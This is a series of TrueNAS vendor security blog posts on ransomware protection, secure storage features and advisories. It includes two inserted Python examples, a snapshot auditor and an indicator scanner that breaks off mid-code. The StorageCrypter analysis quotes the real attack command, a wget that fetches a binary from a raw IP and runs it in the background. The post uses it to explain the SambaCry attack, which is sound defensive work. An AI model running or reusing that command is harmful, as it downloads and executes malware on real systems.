TrueNAS Security Blog Category
Mon, 15 Apr 2024 22:51:08 +0000

TrueNAS is Secure Storage
https://www.truenas.com/blog/truenas-is-secure-storage/
Wed, 21 Jun 2023 07:00:59 +0000

The post TrueNAS is Secure Storage appeared first on TrueNAS - Welcome to the Open Storage Era.

The first line of defense for any device or system on a network is the network itself. Following security best practices for endpoint and perimeter security is the foundation of data security. When properly configured on a secure network, TrueNAS further protects your data from security risks.

TrueNAS continues to receive new and enhanced security features and tools with each release. TrueNAS Enterprise, as well as the free open source TrueNAS editions, are becoming increasingly sophisticated in protecting data from a wide variety of threats. Also, more users are deploying TrueNAS to meet retention and reporting requirements for compliance. To build on this foundation, we are introducing TrueSecure™, an optional FIPS 140-validated crypto module for TrueNAS Enterprise appliances, and launching the updated TrueNAS security site.

Secure by Design

Storage vendors at the lower end of the market, like QNAP and Synology, have made some design decisions that favored ease of use over security, which have subjected their users to continual virus and ransomware attacks. By contrast, enterprise storage products like TrueNAS must be built with security as a primary design principle so that they can integrate into secure network environments and minimize attack vectors against data.

However, new threats come online with such frequency that new features and tools will always be needed to stay ahead of the curve. With TrueNAS SCALE 22.12.3, we introduced a FIPS 140-3 validated crypto module and the option to enable TrueSecure on Enterprise appliances.

New Security Page Provides Enhanced Protection

Infrastructure and data can be better protected with knowledge of all vulnerabilities. The updated TrueNAS Security site now includes a detailed Software Bill of Materials (SBOM) for TrueNAS and provides detailed documentation on all known security vulnerabilities and CVEs. This is done with regular and automated security auditing. Please explore the information which also provides links to the relevant Open Source repositories and planned fixes.

TrueNAS Security Features are Extensive

In a short blog, it is impossible to explain every feature under the umbrella of “security” and why each is important. With ransomware being top of mind in 2023, security features specific to ransomware protection are summarized in this recent blog. The chart below tries to capture the key categories of security-related features in TrueNAS. If you need more information, visit the TrueNAS Security site.

No amount of storage-level security will make up for not following network and general IT best practices. For example, we do not recommend directly attaching TrueNAS to the Internet without a robust firewall. Services like Active Directory and LDAP are also recommended for password administration. By following network security best practices, TrueNAS is more secure.

Backdoor access to storage is an attack vector that concerns users around the world. Whether left vulnerable by a public sector organization or a private business, backdoor access represents a target for both state-sponsored and private malicious actors. TrueNAS can be configured to strictly control access, and unlike proprietary storage vendors, all of the software that enforces those controls is open and reviewable.

TrueNAS SCALE Bluefin Enhances Security

With TrueNAS SCALE Bluefin’s release last year, there have been many security advancements:

Rootless administration allows changing away from using the commonly known “root” username and instead setting up your own unique administrator usernames and passwords.

OpenZFS snapshot retention tags can prevent snapshots from being deleted, remaining on the system permanently as a restore point. This provides additional protection against ransomware by allowing the administrator to make a decision on when it is safe and appropriate to remove the snapshot outside of normal retention policies.

API Keys with ACLs are laying the groundwork for future Role-Based Access Control (RBAC) enhancements in coming releases. This allows further fine-grained control over assigned API key privileges.

2-Factor Authentication (2FA) verifies the identities of administrators using Google Authenticator or any Time-based One-Time Password (TOTP) compliant authentication application. This feature also exists in TrueNAS 13.0.

iX-Storj Globally Distributed Storage is primarily cost-effective cloud storage, but it inherently protects data by encrypting it on the TrueNAS system before distributing the data via erasure coding over a global network. Thanks to the combination of zero-trust and zero-knowledge encryption in use, no storage provider or government entity has access to your private data stored on iX-Storj, so your data remains yours alone.

Introducing 

Government agencies often require specific security and compliance measures in both software and hardware which are not normally required in other businesses. TrueSecure is an optional package available in TrueNAS Enterprise (SCALE 22.12) that delivers specific benefits to Government organizations. Our goal is to comply with the requirements of the NIST Cybersecurity Framework and make this additional security as cost-effective as possible. These capabilities are also the basis of international support for ISO 27001.

Many security capabilities will find their way into TrueNAS, but some of these will be specific to TrueSecure. TrueSecure provides the following capabilities:

FIPS 140-2 validated storage media provide highly secure Data-at-Rest capabilities. Both HDD and SSD (SAS or NVMe) drives can be provided on standard TrueNAS Enterprise systems. These drives are similar to self-encrypting drives (SED) but include tamper-proof mechanisms for additional security.

FIPS 140-3 validated software encryption module provides highly secure Data-in-Transit capabilities. The validated encryption algorithms are more secure than the current open source algorithms and validated for use in critical Federal use-cases. For example, these algorithms will protect administration and data replication tasks.

Key Management Interoperability Protocol (KMIP) provides the capability to centralize the management of SED and ZFS encryption passwords for larger organizations. This capability is also in TrueNAS Enterprise 13.0.

With TrueSecure, iXsystems is actively working to maintain NIST 800-171 Compliance, which is the preferred approach for USA Government entities to manage their cybersecurity. It is a comprehensive and well-structured approach that iXsystems is adopting, along with the TrueNAS product requirements. Any additional capabilities needed are being added to TrueSecure, if not in the general TrueNAS products. iXsystems is also developing Security Technical Information Guides (STIGs) for use with TrueSecure to help lock down TrueNAS Enterprise systems and ensure secure operation.

TrueNAS Enterprise 22.12 is not only secure storage, it can be configured for government-grade security. With the Cobia release later in 2023, new features and tools will continue to enhance security. Areas of active investment include file change auditing, virus scanning, and additional ransomware prevention. Stay tuned for more information, which will be available as Cobia enters its BETA phase in Q3.

If you’d like to speak with iX about any TrueNAS system or security needs, please contact us.

Level Up your Ransomware Protection with TrueNAS
https://www.truenas.com/blog/level-up-your-ransomware-protection-with-truenas/
Tue, 30 May 2023 18:21:36 +0000

The post Level Up your Ransomware Protection with TrueNAS appeared first on TrueNAS - Welcome to the Open Storage Era.

Ransomware remains top of mind for businesses as it continues to make headlines in 2023, with malicious actors targeting companies across the globe for infection and then extorting them for large sums of money. The seemingly random, indiscriminate attacks from criminal or state-sponsored ransomware groups means that preparing for an attack is one of the things keeping IT department managers up at night. Ransomware response policies are being written from the perspective of “not if, but when” due to the rapid pace of evolution and use of zero-day exploits as a means to drive profit into the pockets of criminals.

End-user training campaigns for phishing awareness can mitigate the risk of a perimeter breach, but persistent attempts from advanced or state-sponsored attackers can leverage remote exploits that don’t require user interaction. The first line of defense for any device or system on a network is the network itself. Following security best practices for endpoint and perimeter security is the foundation of ransomware protection. When properly configured on a secure network, TrueNAS further protects your data from ransomware.

TrueNAS offers multiple levels of protection against ransomware, including snapshots, native encryption, authentication, and containerization, just to name a few. And, of course, the code is open source, which makes it easily auditable and keeps eyes on it continuously. With TrueNAS SCALE appliances from iXsystems and TrueCommand, additional layers of protection are available including FIPS 140-3 compliant cryptography modules, limited user permissions during replication, client-side role-based access controls (RBAC) and much more.

Below, we’ll identify some best practices for securing and hardening your TrueNAS SCALE installation against a malicious actor attempting to deploy ransomware.

Install the Latest TrueNAS Updates

As with any software, staying up-to-date with the latest version of TrueNAS will allow you to receive the latest feature enhancements, bug fixes, and security patches. Updates can be performed through the web UI under the System Settings and Update menu, or downloaded separately from the TrueNAS CORE or TrueNAS SCALE download pages and manually installed on your system.

TrueNAS Ransomware Configuration

Set up Recurring Snapshots for your Data

All versions of TrueNAS support copy-on-write OpenZFS snapshots, which prevent data in the snapshots from being encrypted in a ransomware attack. Use the Data Protection tab in TrueNAS SCALE to configure one or more Recurring Snapshot tasks. Because only changed data is saved, snapshots can be taken frequently, giving you a shorter Recovery Point Objective (RPO) for your continuity plans.

Set a Long Retention Time on your Snapshots

As TrueNAS data and snapshots are stored in a copy-on-write manner, the overhead of retaining multiple layers of snapshots is significantly reduced compared to traditional filesystems. With TrueNAS, daily or weekly snapshots can be held for months or years.

Replicate to a Second TrueNAS System

Replicating your data to a second TrueNAS system offers an important second layer of protection against ransomware. This involves not only physical separation, as different physical disks are used to store the data, but also a logical separation of permissions: without permission to write directly to this second system, ransomware cannot modify the contents. A second TrueNAS system also offers a number of other benefits including insurance against downtime from power outages or a natural disaster in your datacenter.

Set Separate Administrative Passwords

Having two identical copies of your data on different systems is good; having two identical administrative passwords on different systems a little less so. Using different passwords on different TrueNAS systems can prevent a single credential compromise from impacting multiple storage systems, and ensures that replicated copies of data remain secure.

Use Pull Replication

When configuring replication, the direction of replication implies the direction of authentication. When properly configured, pull replication means that your second TrueNAS server doesn’t automatically trust your primary server. Even if a malicious actor compromises an administrative user on the primary storage, there is no path for it to authenticate against the second server and remove the replicated snapshots there.

Increase your Snapshot Retention Times on the Destination System

When configuring the pull replication task, set the retention time to a Custom value. Increasing the retention time, based on the available capacity of your secondary system, will allow you to retain an even greater number of snapshots for more granular and longer-term recovery.

Configure Two-Factor Authentication (2FA) for Administrators

To help safeguard against accidental compromise of an administrative account, set up two-factor authentication on your source and destination systems. TrueNAS uses the Time-based One-Time Passwords (TOTP) standard for 2FA, so any mobile application capable of receiving the token can be used as the second factor.

Use a Separate Replication Network

Keeping your replication traffic separate from regular network traffic is a best practice which allows for better monitoring of traffic volume as well as increased performance by removing contention between network interfaces.

Isolate the Second System on your Network

Once configuration of the replication job is finished, configure a firewall or network device to prevent new inbound connections to your secondary system. With pull replication, the secondary system initiates the SSH connection, and only traffic on established sessions is permitted to return. When administrative access to the secondary system is required, a single system or network can be allowed temporary access through the firewall to the web interface.

Lock down the Local Console on Both Systems

Both logical and physical security should be considered for your TrueNAS systems. Securing your systems in a locked room with controlled access is important to prevent physical access. To further mitigate the risks by requiring an administrative login to access the physical console of your TrueNAS system, navigate to the System and Advanced menu in the UI, and ensure that “Show Text Console without a Password Prompt” is unchecked.

Additional Security Options Available with TrueNAS SCALE

FIPS 140 with TrueSecure™

TrueSecure is an optional package for TrueNAS Enterprise customers running 22.12. It delivers specific benefits to government and other organizations who require this additional compliance. This includes FIPS 140-2 validated drives (HDD, SAS SSD, NVMe SSD), which are similar to self-encrypting drives (SED) but include tamper-proof mechanisms for additional security. Also available is a module for FIPS 140-3 validated software encryption for highly secure Data-in-Transit.

Use a Non-Root Login for Administration

When installing TrueNAS SCALE, select the option to use a separate administrative account for web-based administration. If SCALE has already been configured for use with root installation, or the system was migrated from TrueNAS CORE, follow the instructions in the TrueNAS Docs under Using Rootless Login to disable the root account’s interactive login.

Configure a Limited User Account for Replication on your Source System

TrueNAS SCALE allows for a limited user account to be used when authenticating for replication purposes. By following the steps presented in section 8 of the TrueNAS SCALE Evaluation Guide, a user can be created for the sole purpose of replication. This user cannot authenticate to the TrueNAS SCALE web UI or connect to network shares, and may only log in via a shared SSH key.

Hold and Lock your Most Important Snapshots

TrueNAS SCALE offers an additional layer of protection for your important snapshots with OpenZFS snapshot retention tags. Snapshots set up with one or more active retention tags cannot be deleted without releasing the retention holds, and will not be removed at the end of the normal retention period. Unless removed by an administrator, they will remain on the system permanently as a restore point.
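A way to check the snapshot, retention and hold guidance above from the defender's side, as an added example (not TrueNAS or iXsystems code): it parses the output of `zfs list -H -p -t snapshot -o name,creation,userrefs` and flags datasets whose snapshots have stalled, whose oldest restore point is too recent, or that have no held snapshot. The dataset names, sample listing and thresholds are constructed assumptions.

```python
"""Audit ZFS snapshot coverage from `zfs list` output (added example)."""
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample of:
#   zfs list -H -p -t snapshot -o name,creation,userrefs
# -H: tab-separated, no header; -p: creation as epoch seconds;
# userrefs: number of holds (retention tags) on the snapshot.
SAMPLE = "\n".join([
    "tank/projects@auto-2023-05-01_00-00\t1682899200\t1",
    "tank/projects@auto-2023-05-29_00-00\t1685318400\t0",
    "tank/projects@auto-2023-05-30_00-00\t1685404800\t0",
    "tank/scratch@auto-2023-05-27_00-00\t1685145600\t0",
    "tank/scratch@auto-2023-05-30_00-00\t1685404800\t0",
])
NOW = 1685448000            # constructed "current time": 2023-05-30 12:00 UTC
DAY = 86400


@dataclass(frozen=True)
class Snapshot:
    dataset: str
    tag: str
    created: int            # epoch seconds
    holds: int              # value of the userrefs property


def parse_snapshots(text):
    """Turn the tab-separated listing into Snapshot records."""
    snaps = []
    for line in text.splitlines():
        if not line.strip():
            continue
        name, created, userrefs = line.split("\t")
        dataset, _, tag = name.partition("@")
        snaps.append(Snapshot(dataset, tag, int(created), int(userrefs)))
    return snaps


def audit(snaps, now, expected, rpo_s, retention_s, window_s):
    """Return {dataset: [issues]} for every dataset in `expected`.

    expected    -- datasets that must be protected; one with no snapshots
                   never appears in the listing, so it has to be named here
    rpo_s       -- largest acceptable gap between recent snapshots
    retention_s -- how far back the oldest restore point should reach
    window_s    -- how far back gaps are checked (older snapshots are
                   legitimately sparse once retention has pruned them)
    """
    by_ds = defaultdict(list)
    for s in snaps:
        by_ds[s.dataset].append(s)

    findings = {}
    for ds in expected:
        group = sorted(by_ds.get(ds, []), key=lambda s: s.created)
        if not group:
            findings[ds] = ["no snapshots at all"]
            continue
        issues = []
        # Gaps between recent snapshots, ending at "now": catches a stalled
        # snapshot task as well as snapshots that were removed.
        recent = [s.created for s in group if s.created >= now - window_s]
        times = (recent or [group[-1].created]) + [now]
        worst_gap = max(b - a for a, b in zip(times, times[1:]))
        if worst_gap > rpo_s:
            issues.append(f"snapshot gap of {worst_gap // 3600}h exceeds RPO")
        # Depth of history actually available for a rollback.
        depth = now - group[0].created
        if depth < retention_s:
            issues.append(f"oldest restore point is only {depth // DAY}d old")
        # A held snapshot survives both retention expiry and `zfs destroy`.
        if not any(s.holds > 0 for s in group):
            issues.append("no snapshot carries a hold")
        findings[ds] = issues
    return findings


def run_example():
    """Audit the constructed listing with hypothetical thresholds."""
    return audit(
        parse_snapshots(SAMPLE), NOW,
        expected=["tank/projects", "tank/scratch", "tank/vm"],
        rpo_s=DAY, retention_s=14 * DAY, window_s=7 * DAY,
    )


if __name__ == "__main__":
    for dataset, issues in run_example().items():
        print(dataset, "OK" if not issues else "; ".join(issues))
```

Running the same audit on the replication destination as well shows whether its longer retention is actually in effect there.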

For more information on TrueSecure and the security features of TrueNAS SCALE, check out our latest Secure Storage blog.

We are Here to Help

As long as ransomware continues to be a viable revenue stream for bad actors, attacks on companies are likely to continue. When properly configured, TrueNAS can help protect your data and your company from being held for ransom.

If you’re interested in learning more about how TrueNAS can help in the fight against ransomware, visit us at https://www.truenas.com/contact-us/ or give us a call at 1-855-GREP-4-IX.

Royal Mail Cyber Incident
https://www.truenas.com/blog/royal-mail-cyber-incident/
Wed, 22 Feb 2023 11:00:40 +0000

The post Royal Mail Cyber Incident appeared first on TrueNAS - Welcome to the Open Storage Era.

On January 11, 2023, Royal Mail, the official postal service of the UK, released a statement that a “cyber incident” had interrupted their systems. International exports were put on hold while the British postal service tried to put the pieces back together. Although Royal Mail continues to refer to the issue as a “cyber incident”, reports confirm that it was a ransomware attack. All of this following four smaller cyber incidents in the latter months of 2022.

While mail services going to and from the country resumed in full capacity after nearly six weeks, the impact of this attack is still being felt by the Royal Mail and beyond. Much of the UK’s business ecosystem dealt with delays connected to the attack over a month later. An attack on data puts lives and businesses on hold, losing significant amounts of time, money, and peace of mind.

With TrueNAS, you get the data-integrity features of the OpenZFS file system, with exabytes of data protected. All versions of TrueNAS, from the freely available CORE and SCALE to the Enterprise edition included on iXsystems hardware, allow for the creation of a nearly unlimited number of “copy on write” snapshots. The scheduling, creation, and management of snapshots are controlled by the TrueNAS appliance and OpenZFS file system – both legitimate users and malicious malware remotely accessing the shared folders have no way to damage them, either inadvertently or deliberately.

Ransomware may attempt to create encrypted versions of the new files and delete the old ones; however, with TrueNAS, the older, original files will always remain accessible through the OpenZFS snapshot technology. Once your company’s information security team has identified and removed the active malware, recovering from a ransomware attack can be as simple as rolling back the encrypted files or folders to the previous version.

A new generation of ransomware is rising, aimed at targeting hypervisors. With TrueNAS, you remain protected from the newest tactics thanks to an optional integration with VMware snapshot technology. This technology is designed for consistent point-in-time images of critical virtual workloads, ensuring that your data is safe.

TrueNAS offers even more protection against ransomware by using OpenZFS replication to create additional copies of the snapshots on separate systems. This includes “PULL” style replication, where the source machine has no authentication connection to the next level of backup – ensuring that even if an administrative user’s credentials are compromised, the remote system will remain unaffected.

Our world runs on data and it is now more important than ever to protect valuable information from malicious pirates. Ransomware attacks are hard to predict, but may be prevented with the right technology. TrueNAS provides a first and second line of defense against ransomware attacks, giving the TrueNAS community peace of mind.

To learn how to protect your data against ransomware attacks using TrueNAS, contact an iXsystems representative.

Read more on the use of TrueNAS in a Zero-trust Architecture here:
https://www.truenas.com/blog/using-truenas-in-a-zero-trust-architecture/

Read more about combating ransomware with TrueNAS here:
https://www.truenas.com/blog/combating-ransomware-with-truenas/

Combating Ransomware with TrueNAS
https://www.truenas.com/blog/combating-ransomware-with-truenas/
Mon, 02 Aug 2021 20:36:53 +0000

The post Combating Ransomware with TrueNAS appeared first on TrueNAS - Welcome to the Open Storage Era.

Ransomware is making headlines globally but is not receiving a coordinated response from world leaders or the IT industry. Malicious groups ranging from online street thugs to full-blown state-sponsored military operations are infecting computers and holding them for ransom using encryption with little regard for who might be impacted. It’s often not even clear if a successful ransom payment will result in the timely return of the victim’s data.

Governments cannot be expected to solve this problem, and in fact may penalize you for paying a ransom to “terrorists”. IT decision makers must urgently look outside of their standard toolkit because hackers are always looking for new attack vectors to compromise systems. iXsystems TrueNAS offers a robust approach to combating ransomware that embraces mainstream IT solutions while providing additional layers of security that can be integrated into any organization’s ransomware protection strategy.

The Nuts and Bolts of Ransomware

A large portion of systems that fall victim to ransomware are running Microsoft Windows and rely on Windows technologies such as Group Policy and the Volume Shadow Copy Service (VSS) to keep intruders at bay and mitigate the damage they do. While these approaches will prevent some attacks, they often miss the most common yet nefarious ransomware attack vector: a privileged user unintentionally downloading malware that infects and encrypts every resource that they have access to. The more privileged the user, the more damage they can inadvertently cause — up to full and total destruction performed with Administrative access.

In addition to user workstations, consumer-grade NAS systems such as QNAP, Synology, and WD CloudNAS have also fallen victim to high-profile and widespread ransomware attacks. NAS systems like these that are Internet accessible are particularly vulnerable. Where built-in applications and services have root access to the system, each application enabled makes the whole system more vulnerable. Extreme care should be taken before exposing any storage service to the internet, and if required, should be done using a variety of techniques such as incorporating VPNs, Encryption, and two-factor authentication (2FA).

Additionally, many high-profile targets are compromised and analyzed months in advance before a ransomware attack. Adversaries perform reconnaissance to identify and target backup strategies and identify anything that provides an advantage when launching their attack. If necessary, reinforce your network security tools and procedures as they are often the first defense for your storage security.

Ransomware Payments Should be Your Last Resort, Not Your First

The true secret to combating ransomware is to treat it like any other threat to your data and build a robust storage infrastructure that can provide end-to-end data integrity with rapid restoration capabilities. This is where TrueNAS with its OpenZFS file system helps safeguard exabytes of data across the globe from not only ransomware but also the traditional threats that a good data protection strategy is designed to address. From user error to bit rot, you should be ready for anything, and TrueNAS provides key capabilities that give you an upper hand against all risks to your data, including:

  • Bitrot protection, thanks to continuous filesystem checksumming
  • Redundancy, thanks to flexible volume configuration
  • Protection from disrupted writes thanks to a “copy-on-write” design
  • Instant point-in-time, immutable backups thanks to snapshots
  • Fully-validated bit-level backup thanks to snapshot-based replication
  • Optional dataset or full-disk encryption for privacy and compliance
  • Optional high-availability for robust service delivery
  • Cloud backup integration with all leading providers
  • Replication and backup to non-TrueNAS hosts via rsync
  • Windows malware immunity thanks to Unix operating systems
  • SMB share protection with WORM profile options

TrueNAS Goes the Extra Mile for Data Security

In practice, a network of TrueNAS systems delivers industry-standard sharing protocols including SMB, NFS, iSCSI, AFP, and FTP to servers and workstations with the key difference being that essential data protection operations are invisible to users and out of reach of known ransomware. Should a connected system be infected, the administrator can selectively roll back the impacted storage and optionally clone the infected state for forensic analysis. Backup operations also take place transparently to users and are online for continuous inspection with optional air-gapping. This infrastructure can be further secured with:

  • Tightly restricted Internet access with OpenVPN options for remote access
  • Third party Application protections via industry standard containerization technologies
  • Role-based Access Control (RBAC) and auditing with TrueCommand
  • End-to-end encrypted administrative access
  • Least-privileged Active Directory joining authority
  • Optional two-factor authentication for administrative access, including UI and SSH

Isn’t Open Source a Security Disadvantage?

Quite the contrary. Having source code open and available provides significant benefits to security that closed-source products can’t provide. TrueNAS is backed by one of the largest Open Source communities today, the TrueNAS Community, who actively help with specifying requirements, development, validation, and field testing of the software. TrueNAS software is also completely open for transparency and external review to avoid the types of hacks that have become the norm for many closed-source pieces of software.

Time to Take Preventative Action with TrueNAS

Ransomware is a pervasive and evolving threat, but it does not change the fundamental rules and responsibilities of data protection. The TrueNAS family by iXsystems offers flexible storage solutions ranging in size from a few terabytes to many petabytes, with a comprehensive set of security tools, a unified user experience, and up to 24/7 technical support. For up-to-date TrueNAS security information, users should visit security.truenas.com.

Whether you are using TrueNAS CORE, Enterprise, or SCALE, TrueNAS provides the tools needed for data security. The TrueNAS Community Forum is an excellent place to discuss any concerns or ask questions of other experienced users. Contact iXsystems when you are ready for professional support to build secure data infrastructure for your organization.

iXsystems Introduces New TrueNAS Security Hub
https://www.truenas.com/blog/truenas-security-hub/
Wed, 08 Apr 2020 17:28:52 +0000

The post iXsystems Introduces New TrueNAS Security Hub appeared first on TrueNAS - Welcome to the Open Storage Era.

This is historic content that may contain outdated information. For the newest information on FreeNAS and TrueNAS, please visit TrueNAS.com or read our latest Blogs.

Data and systems security is important to every business. The cost of security breaches can be extremely high and consumes IT administration resources. The best strategy is to avoid and minimize those breaches.
TrueNAS and FreeNAS provide many features to assist with security issues. Unlike other storage systems, the software is Open Source and enables anyone to audit the source code and report back to iXsystems about any potential vulnerabilities. iXsystems will then privately investigate, fix any vulnerabilities, and make our community aware of how to best address the issues.
The new TrueNAS Security Hub empowers you with the information you need to maintain the security, integrity, and availability of your data in the midst of possible threats to your IT infrastructure such as vulnerabilities, malware, and ransomware.

The hub includes CVEs (“Common Vulnerabilities and Exposures”: publicly known information on security vulnerabilities and mitigations), errata (technical descriptions of unintended faults in hardware and/or software components), and articles (notices and best practices for security issues regarding TrueNAS and TrueCommand).


The hub also includes security information for FreeNAS and the upcoming release of TrueNAS CORE 12.0. For home and small business users, the goal is to make the latest software robust enough that using the hub is unnecessary.

For Security Officers, there is also a security white paper which details how security and privacy practices have been applied to TrueNAS. To obtain a copy of the white paper, please send an email to security-info@ixsystems.com.

We hope these newly available resources are beneficial to the community and provide System Administrators with the tools to operate their storage systems in a safe and secure manner. iXsystems is constantly improving the TrueNAS software, and there are already several more security features slated to be included in TrueNAS 12.0. To report a potential product-related privacy or security issue (incident, breach or vulnerability), please contact our Security Team at security[at]ixsystems.com.

Visit the TrueNAS Security Hub today for the latest in TrueNAS and FreeNAS security info.

Intel MDS CPU Vulnerability Advisory https://www.truenas.com/blog/intel-mds-cpu-vulnerability-advisory/ Wed, 15 May 2019 16:31:30 +0000

Dear iXsystems Customers:
On May 14th, 2019, Intel released the security advisory below regarding a new CPU microarchitecture vulnerability that affects CPUs with Hyperthreading technology prior to 8th Generation Intel® Core™ processors and 2nd Generation Intel® Xeon® processor Scalable family. This vulnerability was found in a lab environment, and there are no known exploits at this time. Intel has addressed this issue with hardware architectural changes in its newest CPUs.
To minimize exposure to this issue, standard security principles and practices that prevent access to your systems are your best line of defense, as always. However, fully minimizing the issue requires a firmware and OS update or disabling Hyper-Threading on your systems within the BIOS. To receive firmware updates or instructions on disabling Hyper-Threading for your iXsystems servers, please open a support ticket in our Customer Portal, and our Support Team will guide you through the process.
Thank you,
iXsystems Security Team
 
 

Advisory from Intel:

Intel would like to address a new group of vulnerabilities called Microarchitectural Data Sampling (MDS). These were first found by Intel and then independently reported to Intel by security researchers. The MDS vulnerabilities include techniques which exploit speculative operations accessing data in microarchitectural structures within the CPU to expose bits of information through a side channel. Please note, these structures are small and frequently overwritten. However, with a large enough data sample, time, or control of the target system’s behavior, MDS may provide an attacker with access to data that they should not be able to see. It is also important to note that Intel is not aware of any real world exploits of these vulnerabilities.
Intel has addressed MDS in hardware starting with select 8th and 9th Generation Intel® Core™ processors and the 2nd Generation Intel® Xeon® processor Scalable family.
To address MDS in other products, Intel released microcode updates on May 14th, 2019 that are being delivered through firmware updates from system manufacturers. The microcode updates are coupled with corresponding updates to operating systems and hypervisor software. Together, these changes will help keep systems protected. However, these changes may not fully protect systems that use Simultaneous Multi-Threading (SMT). Customers that use these systems should consider how they utilize SMT, guidance from operating systems and virtual machine vendors and their own environment. Because these factors vary considerably, Intel is not recommending that Intel® Hyper-Threading Technology (Intel® HT Technology) be disabled, and it’s important to understand that disabling Intel HT Technology does not alone provide protection against MDS.
You can find more information and other resources regarding MDS at www.intel.com/securityfirst.

iXsystems White paper: TrueNAS Privacy and Security Compliance Features https://www.truenas.com/blog/truenas-privacy-security/ Tue, 18 Sep 2018 22:00:18 +0000 No matter its size, every business operates in a regulated environment. If your business handles customer credit cards, health care records or personally identifiable information, you may be subject to domestic and international regulations such as PCI DSS, HIPAA and the GDPR. This whitepaper provides an overview of the data-at-rest and data-in-flight encryption features in TrueNAS that help your business stay compliant.


Learn more about TrueNAS Security
No matter its size, every business operates in a regulated environment. If your business handles customer credit cards or personally identifiable information, you may be subject to domestic and international regulations such as PCI and the GDPR. This whitepaper provides an overview of the data-at-rest and data-in-flight encryption features in TrueNAS that help your business stay compliant.

The TrueNAS Privacy and Security Compliance Features white paper helps decision makers quickly match key TrueNAS features to industry-specific regulations, which often carry stiff penalties for compliance failures. The broadest of these regulations, the Payment Card Industry Data Security Standard (PCI DSS), applies to any business that handles customer credit cards and mandates their encrypted storage. To help meet this requirement, TrueNAS provides software and hardware-level encryption with integrated key management.

To meet the global obligations of the European Union General Data Protection Regulation (GDPR), TrueNAS offers dataset-level user separation that extends throughout the replication process. With appropriate planning, complying with a user’s “right to be forgotten” can be as simple as deleting their dedicated dataset and its replicas.

To meet the requirements of the medical industry, such as HIPAA and ePHI, TrueNAS adds continuous data integrity validation, data-at-rest and in-flight encryption, and immutable snapshots to mitigate data tampering. For increased encryption performance, TrueNAS also offers TCG OPAL 2.0/AES 256-bit Self-Encrypting Drives (SEDs) and optional FIPS 140-2-compliant SEDs for military-grade data-at-rest protection.

Download the TrueNAS Privacy and Security Compliance Features white paper to learn more about how TrueNAS can play a key role in your regulation compliance strategy. Contact us at sales@ixsystems.com, 1-855-GREP-4-IX (1-855-473-7449) or 1-408-493-4100 (outside the US) to discuss your compliance needs with one of our Solutions Architects. 

StorageCrypter Ransomware: Security Threat or Clickbait? https://www.truenas.com/blog/storagecrypter/ Tue, 26 Dec 2017 18:04:02 +0000 The StorageCrypter Ransomware appears to be targeting NAS systems around the world but the facts surrounding it have been rather contradictory. Let’s look at why your TrueNAS and FreeNAS systems are not vulnerable to this specific attack and how to further protect yourself from this category of attacks.

NOTE: This is historical content that may contain outdated information.

The StorageCrypter Ransomware appears to be targeting NAS systems around the world but the facts surrounding it have been somewhat confusing. Let’s look at why your TrueNAS and FreeNAS systems are not vulnerable to this specific attack and how to further protect yourself from this category of attacks.

Hats off to the most buzzword-loaded headline of the year: “StorageCrypt Ransomware Infecting NAS Devices Using SambaCry”. You shouldn’t have much trouble finding the article or the dozens of reproductions of it but you may have trouble determining exactly what the real-world risks of the “StorageCrypt” ransomware are and if they can impact you as a FreeNAS or TrueNAS user. The various articles suggest that “StorageCrypt” is:

  • Linux ransomware that executes on a storage system
  • Windows ransomware that executes on a connected client
  • Cryptocurrency mining software
  • An encryption product for Windows
  • Also known as StorageCrypter

First off, the “StorageCrypt” ransomware does not appear to have anything to do with the StorageCrypt encryption software found at storagecrypt.com. This naming collision appears to be the result of sloppy journalism and “StorageCrypt ransomware” now wins the search battle against the more-correct “StorageCrypter ransomware”. I will use “StorageCrypter” going forward out of respect for the StorageCrypt authors.
From there, I cannot help but notice that every website relating to “StorageCrypter” is more or less part of Windows-oriented advertising networks for antivirus/anti-ransomware tools, articles, and tutorials, many of which blur the line between the “download” links of articles and “Download NOW!” advertisements. I consider this approach irresponsible given how many of these links are clickbait for what may, in turn, be mildly-malicious adware and spyware. I do however appreciate the clear reminder of why I have never run Microsoft Windows.

What we know about StorageCrypter
The known StorageCrypter victims are finding their files renamed with the “.locked” extension, along with a ransom note entitled “_READ_ME_FOR_DECRYPT.txt” containing information on what has happened and how to get the files back. Some users also see a Windows executable named “美女与野兽.exe”, which translates to “The Beauty and the Beast”, accompanied by an Autorun.inf to launch it. Two reported vulnerable NAS systems are the Thecus 7710G NAS and the Western Digital MyCloud EX4100, the first of which is Intel-based and the second ARM-based, both running GNU/Linux. Both Thecus and Western Digital have issued software updates to address the issue, as have Cisco, NETGEAR, QNAP, Synology, Veritas and NetApp as a precaution.

As for how these systems were attacked, at least one user confessed, “I exposed my WD MyCloud to the internet via port forwarding on my router”. Doing this is indeed a plausible vector for the “SambaCry” vulnerability to take advantage of the Samba SMB service version 3.5.0 through versions 4.6.4, 4.5.10 and 4.4.14. “SambaCry”, or more accurately CVE-2017-7494, allows a carefully-crafted Samba shared library to be injected over network port 445 provided that the attacker can guess the path to a writable share. If these required criteria are met and the shared library is executed by Samba, the attacker can execute shell commands on the target system with the permissions of the smbd process. In the case of StorageCrypter, those commands appear to be ‘wget -O /tmp/apaceha http://45.76.102.45/sambacry && chmod -x /tmp/apaceha &&nohub /tmp/apaceha >/dev/null 2>&1 &’ which downloads and executes a binary named “sambacry” that is renamed to “apaceha”. According to one source, this payload is a downloader of other payloads that could be as simple as the “美女与野兽.exe” landmine for Windows users to step on but this has not been confirmed. Running the program would execute the ransomware on the connected Windows system, encrypting all accessible files on the NAS system and possibly other locations such as local disks.
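A share can be checked for the artifacts described above (the “.locked” extension, the ransom note, the Windows executable and its Autorun.inf). The following is an added example, not code from the original article or from iXsystems; the function names and the constructed sample tree are assumptions made for illustration.

```python
import os
import re

# Indicators named in the article; everything else here is illustrative.
RANSOM_NOTE = "_READ_ME_FOR_DECRYPT.txt"
LOCKED_SUFFIX = ".locked"
DROPPER_NAME = "美女与野兽.exe"
AUTORUN_TARGET = re.compile(r"^\s*(?:open|shellexecute)\s*=\s*(.+?)\s*$", re.I | re.M)


def scan_share(root):
    """Walk a share; return {indicator kind: sorted relative paths}."""
    hits = {"ransom_note": [], "locked_file": [], "dropper": [], "autorun": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name == RANSOM_NOTE:
                hits["ransom_note"].append(rel)
            elif name.lower().endswith(LOCKED_SUFFIX):
                hits["locked_file"].append(rel)
            elif name == DROPPER_NAME:
                hits["dropper"].append(rel)
            elif name.lower() == "autorun.inf":
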